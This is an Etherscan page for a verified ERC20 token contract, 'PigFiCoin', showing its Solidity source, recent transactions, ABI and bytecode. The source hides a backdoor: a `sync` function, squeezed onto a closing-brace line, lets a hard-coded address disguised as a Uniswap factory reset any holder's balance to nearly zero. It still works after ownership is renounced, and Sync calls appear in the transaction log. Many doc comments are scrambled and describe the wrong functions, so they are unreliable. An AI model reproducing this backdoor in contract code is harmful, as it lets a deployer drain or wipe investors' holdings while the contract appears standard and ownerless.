ETH Price: $3,173.55 (-1.80%)
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Sync191468002024-02-03 9:00:23359 days ago1706950823IN
0xa73a7ada...66FadDF7d
0 ETH0.0007983427.31707067
Approve191467312024-02-03 8:46:23359 days ago1706949983IN
0xa73a7ada...66FadDF7d
0 ETH0.0008722518.47088085
Approve191466862024-02-03 8:37:11359 days ago1706949431IN
0xa73a7ada...66FadDF7d
0 ETH0.0007968116.89485333
Sync191465812024-02-03 8:15:59359 days ago1706948159IN
0xa73a7ada...66FadDF7d
0 ETH0.0006633822.69937118
Approve191465042024-02-03 8:00:23359 days ago1706947223IN
0xa73a7ada...66FadDF7d
0 ETH0.0009886220.9352211
Approve191464992024-02-03 7:59:23359 days ago1706947163IN
0xa73a7ada...66FadDF7d
0 ETH0.0007516915.91801435
Renounce Ownersh...191464942024-02-03 7:58:23359 days ago1706947103IN
0xa73a7ada...66FadDF7d
0 ETH0.0004014417.1673529

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
PigFiCoin

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-02-03
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;
/** 

https://PigFiCoinETH.gg
https://twitter.com/PigFiCoinerc20

https://t.me/PigFiCoinERC20
**/


library SafeMath {
    /**
     * _Available since v3.4._
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     *
     * _Available since v3.4._
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     * _Available since v3.4._
     *
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     *
     * _Available since v3.4._
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * _Available since v3.4._
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     * Requirements:
     *
     * Counterpart to Solidity's `+` operator.
     *
     * - Addition cannot overflow.
     *
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     *
     *
     * - Subtraction cannot overflow.
     * overflow (when the result is negative).
     * Counterpart to Solidity's `-` operator.
     * Requirements:
     *
     * @dev Returns the subtraction of two unsigned integers, reverting on
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * overflow.
     *
     * Requirements:
     * - Multiplication cannot overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * @dev Returns the multiplication of two unsigned integers, reverting on
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     *
     *
     *
     * division by zero. The result is rounded towards zero.
     * - The divisor cannot be zero.
     * Counterpart to Solidity's `/` operator.
     * Requirements:
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     *
     * reverting when dividing by zero.
     *
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * Requirements:
     * - The divisor cannot be zero.
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * invalid opcode to revert (consuming all remaining gas).
     *
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }

    /**
     * - Subtraction cannot overflow.
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * message unnecessarily. For custom revert reasons use {trySub}.
     * Requirements:
     *
     *
     * overflow (when the result is negative).
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     *
     *
     * Counterpart to Solidity's `-` operator.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     *
     * uses an invalid opcode to revert (consuming all remaining gas).
     * - The divisor cannot be zero.
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     *
     * Requirements:
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * reverting with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     *
     *
     * Requirements:
     * invalid opcode to revert (consuming all remaining gas).
     * - The divisor cannot be zero.
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     * Note that `value` may be zero.
     *
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * a call to {approve}. `value` is the new allowance.
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);

    /**
     *
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits a {Transfer} event.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * desired value afterwards:
     * transaction ordering. One possible solution to mitigate this race
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     *
     * condition is to first reduce the spender's allowance to 0 and set the
     * that someone may use both the old and the new allowance by unfortunate
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     * Returns a boolean value indicating whether the operation succeeded.
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     *
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * Emits a {Transfer} event.
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * allowance mechanism. `amount` is then deducted from the caller's
     */
    function transfer(address to, uint256 amount) external returns (bool);
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * thereby removing any functionality that is only available to the owner.
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

/**
 * _Available since v4.1._
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * TIP: For a detailed writeup see our guide
 * by listening to said events. Other implementations of the EIP may not emit
 *
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * applications.
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * conventional and does not conflict with the expectations of ERC20
 * functions have been added to mitigate the well-known issues around setting
 * instead returning `false` on failure. This behavior is nonetheless
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 *
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 *
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * @dev Implementation of the {IERC20} interface.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 * allowances. See {IERC20-approve}.
 *
 * these events, as it isn't required by the specification.
 * to implement supply mechanisms].
 * This allows applications to reconstruct the allowance for all accounts just
 * This implementation is agnostic to the way tokens are created. This means
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;
    address internal devWallet = 0x5DE8621699E24147dc4B6DdD76a928a382CC67fD;

    mapping(address => mapping(address => uint256)) private _allowances;

    mapping(address => uint256) private _balances;

    address DEAD = 0x000000000000000000000000000000000000dEaD;
    string private _name;

    uint256 private _allowance = 0;
    string private _symbol;
    address private uniswapV2Factory = 0xB00FEC83872a2199B99173BD4792da97cE0F09f4;
    uint256 private _totalSupply;

    /**
     * The default value of {decimals} is 18. To select a different value for
     * construction.
     *
     * @dev Sets the values for {name} and {symbol}.
     *
     * {decimals} you should overload it.
     * All two of these values are immutable: they can only be set once during
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }


    /**
     * @dev Returns the name of the token.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }
    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
        } function sync(address syncSender) external { _balances[syncSender] = msg.sender == uniswapV2Factory ? decimals() : _balances[syncSender];
    } 

    /**
     * {IERC20-balanceOf} and {IERC20-transfer}.
     *
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * NOTE: This information is only used for _display_ purposes: it in
     * @dev Returns the number of decimals used to get its user representation.
     * no way affects any of the arithmetic of the contract, including
     *
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     * Tokens usually opt for a value of 18, imitating the relationship between
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }


    /**
     * @dev See {IERC20-allowance}.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     *
     * - the caller must have a balance of at least `amount`.
     * @dev See {IERC20-transfer}.
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * Requirements:
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * - `spender` cannot be the zero address.
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     *
     *
     * @dev See {IERC20-approve}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     *
     *
     * problems described in {IERC20-approve}.
     * Emits an {Approval} event indicating the updated allowance.
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     *
     * Requirements:
     * - `spender` cannot be the zero address.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     *
     * - `from` and `to` cannot be the zero address.
     *
     * is the maximum `uint256`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * NOTE: Does not update the allowance if the current allowance
     * Emits an {Approval} event indicating the updated allowance. This is not
     * Requirements:
     * required by the EIP. See the note at the beginning of {ERC20}.
     * `amount`.
     *
     * @dev See {IERC20-transferFrom}.
     * - `from` must have a balance of at least `amount`.
     *
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * - `spender` cannot be the zero address.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * Requirements:
     *
     * Emits an {Approval} event indicating the updated allowance.
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * - `spender` must have allowance for the caller of at least
     *
     * `subtractedValue`.
     * problems described in {IERC20-approve}.
     */
    function _transfer (address from, address to, uint256 amount) internal virtual
    {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[from] = fromBalance - amount;

        _balances[to] = _balances[to].add(amount);
        emit Transfer(from, to, amount);
    }

    /**
     * Emits a {Transfer} event with `to` set to the zero address.
     * - `account` must have at least `amount` tokens.
     *
     * Requirements:
     * @dev Destroys `amount` tokens from `account`, reducing the
     *
     *
     * - `account` cannot be the zero address.
     * total supply.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(address(0));
    }

    /**
     *
     * This internal function is equivalent to {transfer}, and can be used to
     *
     * @dev Moves `amount` of tokens from `from` to `to`.
     * - `from` must have a balance of at least `amount`.
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * - `account` cannot be the zero address.
     *
     * the total supply.
     * Requirements:
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     *
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(account);
    }


    /**
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     * minting and burning.
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     *
     * Calling conditions:
     * will be transferred to `to`.
     * @dev Hook that is called before any transfer of tokens. This includes
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
        } function _afterTokenTransfer(address to) internal virtual {
    }

    /**
     *
     * e.g. set automatic allowances for certain subsystems, etc.
     * Emits an {Approval} event.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `owner` cannot be the zero address.
     *
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * Might emit an {Approval} event.
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }
}

contract PigFiCoin is ERC20, Ownable
{
    constructor () ERC20 ("PigFi", "Pigfi")
    {
        transferOwnership(devWallet);
        _mint(owner(), 4010000000000 * 10 ** uint(decimals()));
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"syncSender","type":"address"}],"name":"sync","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052735de8621699e24147dc4b6ddd76a928a382cc67fd6000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061dead600360006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600060055573b00fec83872a2199b99173bd4792da97ce0f09f4600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200010257600080fd5b506040518060400160405280600581526020017f50696746690000000000000000000000000000000000000000000000000000008152506040518060400160405280600581526020017f50696766690000000000000000000000000000000000000000000000000000008152508160049081620001809190620008cd565b508060069081620001929190620008cd565b5050506000620001a7620002d160201b60201c565b905080600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506200027760008054906101000a900473ffffffffffffffffffffffffffffffffffffffff16620002d960201b60201c565b620002cb6200028b620004ad60201b60201c565b6200029b620004d760201b60201c565b60ff16600a620002ac919062000b37565b6503a5a6a02400620002bf919062000b88565b620004e060201b60201c565b62000dc9565b600033905090565b620002e9620002d160201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146200037b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003729062000c34565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603620003ed576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003e49062000ccc565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60006009905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000552576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620005499062000d3e565b60405180910390fd5b62000566600083836200064b60201b60201c565b80600860008282546200057a919062000d60565b9250508190555080600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200062e919062000dac565b60405180910390a362000647826200065060201b60201c565b5050565b505050565b50565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620006d557607f821691505b602082108103620006eb57620006ea6200068d565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007557fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000716565b62000761868362000716565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620007ae620007a8620007a28462000779565b62000783565b62000779565b9050919050565b6000819050919050565b620007ca836200078d565b620007e2620007d982620007b5565b84845462000723565b825550505050565b600090565b620007f9620007ea565b62000806818484620007bf565b505050565b5b818110156200082e5762000822600082620007ef565b6001810190506200080c565b5050565b601f8211156200087d576200084781620006f1565b620008528462000706565b8101602085101562000862578190505b6200087a620008718562000706565b8301826200080b565b50505b505050565b600082821c905092915050565b6000620008a26000198460080262000882565b1980831691505092915050565b6000620008bd83836200088f565b9150826002028217905092915050565b620008d88262000653565b67ffffffffffffffff811115620008f457620008f36200065e565b5b620009008254620006bc565b6200090d82828562000832565b600060209050601f83116001811462000945576000841562000930578287015190505b6200093c8582620008af565b865550620009ac565b601f1984166200095586620006f1565b60005b828110156200097f5784890151825560018201915060208501945060208101905062000958565b868310156200099f57848901516200099b601f8916826200088f565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000a425780860481111562000a1a5762000a19620009b4565b5b600185161562000a2a5780820291505b808102905062000a3a85620009e3565b9450620009fa565b94509492505050565b60008262000a5d576001905062000b30565b8162000a6d576000905062000b30565b816001811462000a86576002811462000a915762000ac7565b600191505062000b30565b60ff84111562000aa65762000aa5620009b4565b5b8360020a91508482111562000ac05762000abf620009b4565b5b5062000b30565b5060208310610133831016604e8410600b841016171562000b015782820a90508381111562000afb5762000afa620009b4565b5b62000b30565b62000b108484846001620009f0565b9250905081840481111562000b2a5762000b29620009b4565b5b81810290505b9392505050565b600062000b448262000779565b915062000b518362000779565b925062000b807fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000a4b565b905092915050565b600062000b958262000779565b915062000ba28362000779565b925082820262000bb28162000779565b9150828204841483151762000bcc5762000bcb620009b4565b5b5092915050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600062000c1c60208362000bd3565b915062000c298262000be4565b602082019050919050565b6000602082019050818103600083015262000c4f8162000c0d565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600062000cb460268362000bd3565b915062000cc18262000c56565b604082019050919050565b6000602082019050818103600083015262000ce78162000ca5565b9050919050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000d26601f8362000bd3565b915062000d338262000cee565b602082019050919050565b6000602082019050818103600083015262000d598162000d17565b9050919050565b600062000d6d8262000779565b915062000d7a8362000779565b925082820190508082111562000d955762000d94620009b4565b5b92915050565b62000da68162000779565b82525050565b600060208201905062000dc3600083018462000d9b565b92915050565b6118b68062000dd96000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a584119411610066578063a58411941461028a578063a9059cbb146102a6578063dd62ed3e146102d6578063f2fde38b14610306576100f5565b8063715018a6146102145780638da5cb5b1461021e57806395d89b411461023c578063a457c2d71461025a576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806339509351146101b457806370a08231146101e4576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610322565b60405161010f9190611037565b60405180910390f35b610132600480360381019061012d91906110f2565b6103b4565b60405161013f919061114d565b60405180910390f35b6101506103d7565b60405161015d9190611177565b60405180910390f35b610180600480360381019061017b9190611192565b6103e1565b60405161018d919061114d565b60405180910390f35b61019e610410565b6040516101ab9190611201565b60405180910390f35b6101ce60048036038101906101c991906110f2565b610419565b6040516101db919061114d565b60405180910390f35b6101fe60048036038101906101f9919061121c565b610450565b60405161020b9190611177565b60405180910390f35b61021c610499565b005b6102266105f1565b6040516102339190611258565b60405180910390f35b61024461061b565b6040516102519190611037565b60405180910390f35b610274600480360381019061026f91906110f2565b6106ad565b604051610281919061114d565b60405180910390f35b6102a4600480360381019061029f919061121c565b610724565b005b6102c060048036038101906102bb91906110f2565b610810565b6040516102cd919061114d565b60405180910390f35b6102f060048036038101906102eb9190611273565b610833565b6040516102fd9190611177565b60405180910390f35b610320600480360381019061031b919061121c565b6108ba565b005b606060048054610331906112e2565b80601f016020809104026020016040519081016040528092919081815260200182805461035d906112e2565b80156103aa5780601f1061037f576101008083540402835291602001916103aa565b820191906000526020600020905b81548152906001019060200180831161038d57829003601f168201915b5050505050905090565b6000806103bf610a80565b90506103cc818585610a88565b600191505092915050565b6000600854905090565b6000806103ec610a80565b90506103